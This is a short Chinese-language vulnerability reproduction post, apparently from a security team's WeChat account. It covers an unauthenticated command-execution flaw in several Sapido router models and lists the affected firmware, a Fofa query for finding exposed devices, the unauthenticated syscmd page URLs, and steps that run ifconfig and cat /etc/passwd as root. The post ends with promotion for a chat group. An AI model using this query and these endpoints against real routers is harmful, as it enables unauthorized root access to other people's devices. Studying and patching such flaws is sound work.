免责声明
月落星沉研究室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!
产品介绍
0x00 漏洞描述
Sapido路由器存在命令执行漏洞,攻击者可通过未授权进入命令执行页面,进而可以root权限执行任意命令。
0x01影响版本
BR270n-v2.1.03
BRC76n-v2.1.03
GR297-v2.1.3
RB1732-v2.0.43
0x03 网络资产查找
Fofa:app="Sapido-路由器"
4.POC
http://xxx.xxx.xxx.xxx/syscmd.asp
http://xxx.xxx.xxx.xxx/syscmd.htm
0x05 漏洞复现
1)访问Sapido路由器web登录页面
2)访问POC进入命令执行页面
http://xxx.xxx.xxx.xxx:1080/syscmd.htm
3)执行ifconfig、cat /etc/passwd等命令
本文由月落星辰团队编写,我们会在群里发送公开直播课链接,群聊已满的添加Vx:linjialelovejesus,备注进群听课。
欢迎各位网安工程师加入月落安全研究实验室,一起学习交流讨论!(已加入一二三四五群的无需重复加群,听课链接我们会同步)
原文始发于微信公众号(月落安全):超高危漏洞!!Sapido多款路由器命令执行漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论